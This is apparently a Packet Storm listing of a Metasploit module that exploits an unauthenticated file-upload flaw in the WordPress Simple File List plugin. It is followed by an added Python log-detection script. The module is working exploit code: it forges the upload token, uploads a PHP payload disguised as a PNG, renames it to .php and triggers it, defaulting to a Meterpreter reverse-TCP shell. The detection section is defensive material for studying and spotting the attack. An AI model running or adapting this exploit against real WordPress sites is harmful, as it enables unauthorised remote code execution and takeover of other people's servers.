
WordPress Simple File List Unauthenticated Remote Code Execution

Posted Nov 25, 2020
Authored by h00die, coiffeur | Site metasploit.com

This Metasploit module exploits the WordPress Simple File List plugin, versions prior to 4.2.3, which allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not enforce the same file-extension restrictions, so arbitrary PHP code can be uploaded first as a .png, then renamed to .php and executed.

tags | exploit, remote, arbitrary, php
MD5 | 53dc99d870452eb23bdf7882ccb0c3e3

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Simple File List Unauthenticated Remote Code Execution',
        'Description' => %q{
          Simple File List (simple-file-list) plugin before 4.2.3 for WordPress allows remote unauthenticated attackers
          to upload files within a controlled list of extensions. However, the rename function does not conform to
          the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed
          to php and executed.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'coiffeur', # initial discovery and PoC
            'h00die', # msf module
          ],
        'References' =>
          [
            [ 'URL', 'https://wpscan.com/vulnerability/10192' ],
            [ 'URL', 'https://www.cybersecurity-help.cz/vdb/SB2020042711' ],
            [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list' ],
            [ 'EDB', '48349' ]
          ],
        'Platform' => [ 'php' ],
        'Privileged' => false,
        'Arch' => ARCH_PHP,
        'Targets' =>
          [
            [
              'Default',
              {
                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
              }
            ]
          ],
        'DisclosureDate' => '2020-04-27',
        'DefaultTarget' => 0,
        'Notes' => {
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
      ]
    )
  end

  # directory the plugin writes uploaded files to (and serves them from)
  def dir_path
    '/wp-content/uploads/simple-file-list/'
  end

  # plugin endpoint that accepts the multipart upload
  def upload_path
    '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
  end

  # plugin endpoint that performs file actions such as Rename
  def move_path
    '/wp-content/plugins/simple-file-list/ee-file-engine.php'
  end

  def upload(filename)
    print_status('Attempting to upload the PHP payload as a PNG file')
    now = Date.today.to_time.to_i.to_s
    data = Rex::MIME::Message.new
    data.add_part('1', nil, nil, 'form-data; name="eeSFL_ID"')
    data.add_part(dir_path, nil, nil, 'form-data; name="eeSFL_FileUploadDir"')
    data.add_part(now, nil, nil, 'form-data; name="eeSFL_Timestamp"')
    # the upload token is derived from a fixed salt and the timestamp sent above
    data.add_part(Digest::MD5.hexdigest("unique_salt#{now}"), nil, nil, 'form-data; name="eeSFL_Token"')
    data.add_part("#{payload.encoded}\n", 'image/png', nil, "form-data; name=\"file\"; filename=\"#{filename}.png\"")

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, upload_path),
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s
    )

    fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
    # the server will respond with a 200, but if the timestamp and token don't match it won't give back SUCCESS as it failed
    fail_with(Failure::UnexpectedReply, "#{peer} - File failed to upload") unless res.body.include?('SUCCESS')

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.png"),
      'method' => 'GET'
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
    # 404 could be AV got it or something similar
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}. File was uploaded successfully, but could not be found.") if res.code == 404
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200

    print_good('PNG payload successfully uploaded')
  end

  def rename(filename)
    print_status("Attempting to rename #{filename}.png to #{filename}.php")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, move_path),
      'method' => 'POST',
      'vars_post' => {
        'eeSFL_ID' => 1,
        'eeFileOld' => "#{filename}.png",
        'eeListFolder' => '/',
        'eeFileAction' => "Rename|#{filename}.php"
      }
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200

    print_good("Successfully renamed #{filename}.png to #{filename}.php")
  end

  def check
    return CheckCode::Unknown unless wordpress_and_online?

    # check the plugin version from readme
    check_plugin_version_from_readme('simple-file-list', '4.2.3', '1.0.1')
  end

  def exploit
    # filename of the file to be uploaded/created
    filename = Rex::Text.rand_text_alphanumeric(8)
    register_file_for_cleanup("#{filename}.php")

    upload(filename)
    rename(filename)
    print_status('Triggering shell')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.php"),
      'method' => 'GET'
    )
  end
end
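Detection logic for the upload-then-rename sequence the module performs, as an added example that is not part of the Packet Storm page or the Metasploit module. It assumes combined-format (Apache/nginx) access logs and uses constructed sample lines; the endpoint and upload-directory paths are the ones the module above targets.

```python
"""Flag the Simple File List upload -> rename -> execute chain in access logs.
Added example, not from the Packet Storm page or the Metasploit module. Assumes
combined-format access logs; sample lines are constructed. POST bodies (and so
the 'Rename|x.php' action) are not logged, so the per-client sequence is the
signal: POST ee-upload-engine.php, then POST ee-file-engine.php, then GET of a
.php file under /wp-content/uploads/simple-file-list/."""
import re
from collections import defaultdict

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) '
                    r'(?P<path>\S+) [^"]*" (?P<status>\d{3})')
PLUGIN = "/wp-content/plugins/simple-file-list/"
UPLOAD_EP, RENAME_EP = PLUGIN + "ee-upload-engine.php", PLUGIN + "ee-file-engine.php"
UPLOAD_DIR = "/wp-content/uploads/simple-file-list/"

# constructed sample log: one client completes the chain, one does not
SAMPLE_LOG = """\
203.0.113.7 - - [25/Nov/2020:10:00:01 +0000] "POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1" 200 7
203.0.113.7 - - [25/Nov/2020:10:00:02 +0000] "GET /wp-content/uploads/simple-file-list/Kd8xQ2mA.png HTTP/1.1" 200 52
203.0.113.7 - - [25/Nov/2020:10:00:03 +0000] "POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1" 200 2
203.0.113.7 - - [25/Nov/2020:10:00:04 +0000] "GET /wp-content/uploads/simple-file-list/Kd8xQ2mA.php HTTP/1.1" 200 0
198.51.100.4 - - [25/Nov/2020:10:05:00 +0000] "GET /wp-content/uploads/simple-file-list/report.pdf HTTP/1.1" 200 9001
198.51.100.4 - - [25/Nov/2020:10:05:01 +0000] "POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1" 200 7
"""

def parse(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_upload_rename_chains(log_text):
    """Return {client_ip: [executed .php paths]} for clients that completed all 3 stages."""
    stage = defaultdict(int)   # how far each client has progressed (0..2)
    hits = defaultdict(list)
    for line in log_text.splitlines():
        r = parse(line)
        if not r:
            continue
        ip, method, path = r["ip"], r["method"], r["path"].split("?", 1)[0]
        if method == "POST" and path == UPLOAD_EP:
            stage[ip] = max(stage[ip], 1)
        elif method == "POST" and path == RENAME_EP and stage[ip] >= 1:
            stage[ip] = 2
        elif (method == "GET" and path.startswith(UPLOAD_DIR)
              and path.lower().endswith(".php") and stage[ip] >= 2):
            hits[ip].append(path)
    return dict(hits)
```

A GET for any .php under the uploads directory is worth alerting on by itself; the staged match above only raises confidence and ties the hit back to the plugin's endpoints.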